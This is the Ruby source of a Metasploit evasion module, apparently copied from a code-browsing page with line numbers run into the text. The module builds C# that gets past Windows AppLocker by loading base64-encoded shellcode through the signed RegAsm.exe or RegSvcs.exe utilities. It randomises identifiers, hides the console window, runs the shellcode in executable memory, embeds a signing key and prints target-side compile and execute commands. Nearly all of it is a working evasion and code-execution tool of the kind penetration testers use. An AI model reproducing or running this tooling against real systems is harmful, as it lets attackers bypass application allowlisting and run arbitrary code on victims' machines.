Path: blob/master/modules/evasion/windows/applocker_evasion_regasm_regsvcs.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Evasion67def initialize(info = {})8super(9update_info(10info,11'Name' => 'Applocker Evasion - Microsoft .NET Assembly Registration Utility',12'Description' => %q{13This module will assist you in evading Microsoft14Windows Applocker and Software Restriction Policies.15This technique utilises the Microsoft signed binaries16RegAsm.exe or RegSvcs.exe to execute user supplied code.17},18'Author' => [19'Nick Tyrer <@NickTyrer>', # module development20'Casey Smith' # regasm_regsvcs bypass research21],22'License' => MSF_LICENSE,23'Platform' => 'win',24'Arch' => [ARCH_X86, ARCH_X64],25'Targets' => [['Microsoft Windows', {}]],26'References' => [['URL', 'https://attack.mitre.org/techniques/T1121/']]27)28)2930register_options(31[32OptString.new('TXT_FILE', [true, 'Filename for the evasive file (default: regasm_regsvcs.txt)', 'regasm_regsvcs.txt']),33OptString.new('SNK_FILE', [true, 'Filename for the .snk file (default: key.snk)', 'key.snk'])34]35)3637deregister_options('FILENAME')38end3940def build_payload41Rex::Text.encode_base64(payload.encoded)42end4344def obfu45Rex::Text.rand_text_alpha 846end4748def regasm_regsvcs49esc = build_payload50mod = [obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu]51<<~HEREDOC52using System;53using System.EnterpriseServices;54using System.Runtime.InteropServices;55namespace #{mod[0]}56{57public class #{mod[1]} : ServicedComponent58{59[ComRegisterFunction]60public static void RegisterClass(string #{mod[2]})61{62#{mod[3]}.#{mod[14]}();63}64[ComUnregisterFunction]65public static void UnRegisterClass(string #{mod[2]})66{67#{mod[3]}.#{mod[14]}();68}69}70public class #{mod[3]}71{72private static Int32 #{mod[4]}=0x1000;73private static IntPtr #{mod[5]}=(IntPtr)0x40;74private static UInt32 #{mod[6]} = 0xFFFFFFFF;75[System.Runtime.InteropServices.DllImport("kernel32")]76private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);77[System.Runtime.InteropServices.DllImport("kernel32")]78private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);79[System.Runtime.InteropServices.DllImport("kernel32")]80private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);81[System.Runtime.InteropServices.DllImport("user32.dll")]82static extern bool ShowWindow(IntPtr #{mod[7]}, int nCmdShow);83[System.Runtime.InteropServices.DllImport("Kernel32")]84private static extern IntPtr GetConsoleWindow();85const int #{mod[8]} = 0;86public static void #{mod[14]}()87{88IntPtr #{mod[7]};89#{mod[7]} = GetConsoleWindow();90ShowWindow(#{mod[7]}, #{mod[8]});91string #{mod[9]} = "#{esc}";92byte[] #{mod[10]} = Convert.FromBase64String(#{mod[9]});93byte[] #{mod[11]} = #{mod[10]};94IntPtr #{mod[12]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{mod[11]}.Length, #{mod[4]}, #{mod[5]});95System.Runtime.InteropServices.Marshal.Copy(#{mod[11]}, 0, #{mod[12]}, #{mod[11]}.Length);96IntPtr #{mod[13]} = IntPtr.Zero;97WaitForSingleObject(CreateThread(#{mod[13]}, UIntPtr.Zero, #{mod[12]}, #{mod[13]}, 0, ref #{mod[13]}), #{mod[6]});98}99}100}101HEREDOC102end103104def snk105debaser = 'BwIAAAAkAABSU0EyAAQAAAEAAQD9yIxqf9oJgwLw6nUHqVNq4LaP+/eaL4qTT9K9aV/z7ddCP8+Uf2/47KnHklpaw+eH03ZaA2yKYBA9s+Al0VoyajA76HQp106HDaCgiURBIT2GBLUGwdhoEMWX5J8eoCzkucJEjSsavQh+r9JeB6zcQvoZIx0PrpELgQc8is8j2jvsFuc5LQ8ZFoPk1273TTxKibw84HFESjxJrRtkSjwoEo4OUuZtL3C7fD107gnaSoeLnMwohmyTTjt15zgBZv7xD5u/CHD4/+tySJufY5j0FkBxhyqt2DWHcmH4MQCC6PgYfIuTXEAD35o0cg+6s6pJYKB+DUCrU5vSime3jyWno9vCe87UT+fQcDrKntHB108mjnj9WliAMZlU1IuCWieT7fzGZqqIsd4rrcgxetnWzaWRAkgHcTVkmVPIt0z9zHU71s7CER2viklJkiaZjRQan5ZA7bTqqsuG1xoIyXTWbKsaAMCKf5a4IJS2ImpqaYA9HR109BrIV7be2o0QJxSm1LPqBXJqkAhnCpcYyfve2dql7fF+fAIDGe3ZgCEbJsfYuAaAY0snGJQhUgLmwO8GDbsbMUTuBQspDv8QXsF53UNH5v5dnOKaTfo71LrI+I5zBUqEYP3B110DtK0qryu/J1eq80nPAmpNqRbFnYm1OdGKpgzHS+Ws7obPSt1HG3//BxC3a5znX0evfCfSaaWRswhjvblnh1070b3jkT6nJeksKuuVEHvudAQAtGn2vxNDs4CqrJODi5Z/BA111KgpIZqQeZmh3r4Zb5OI0='112Rex::Text.decode_base64(debaser)113end114115def file_format_filename(name = '')116name.empty? ? @fname : @fname = name117end118119def create_files120f1 = datastore['TXT_FILE'].empty? ? 'regasm_regsvcs.txt' : datastore['TXT_FILE']121f1 << '.txt' unless f1.downcase.end_with?('.txt')122f2 = datastore['SNK_FILE'].empty? ? 'key.snk' : datastore['SNK_FILE']123f2 << '.snk' unless f2.downcase.end_with?('.snk')124txt_file = regasm_regsvcs125snk_file = snk126file_format_filename(f1)127file_create(txt_file)128file_format_filename(f2)129file_create(snk_file)130end131132def instructions133print_status "Copy #{datastore['TXT_FILE']} and #{datastore['SNK_FILE']} to the target"134if payload.arch.first == ARCH_X86135print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:#{datastore['TXT_FILE'].gsub('.txt', '.dll')} /keyfile:#{datastore['SNK_FILE']} #{datastore['TXT_FILE']}"136print_status "Execute using: C:\\Windows\\Microsoft.NET\\Framework\\[.NET Version]\\regsvcs.exe #{datastore['TXT_FILE'].gsub('.txt', '.dll')}"137print_status 'or'138print_status "Execute using: C:\\Windows\\Microsoft.NET\\Framework\\[.NET Version]\\regasm.exe /U #{datastore['TXT_FILE'].gsub('.txt', '.dll')}"139else140print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:#{datastore['TXT_FILE'].gsub('.txt', '.dll')} /keyfile:#{datastore['SNK_FILE']} #{datastore['TXT_FILE']}"141print_status "Execute using: C:\\Windows\\Microsoft.NET\\Framework64\\[.NET Version]\\regsvcs.exe #{datastore['TXT_FILE'].gsub('.txt', '.dll')}"142print_status 'or'143print_status "Execute using: C:\\Windows\\Microsoft.NET\\Framework64\\[.NET Version]\\regasm.exe /U #{datastore['TXT_FILE'].gsub('.txt', '.dll')}"144end145end146147def run148create_files149instructions150end151end152153154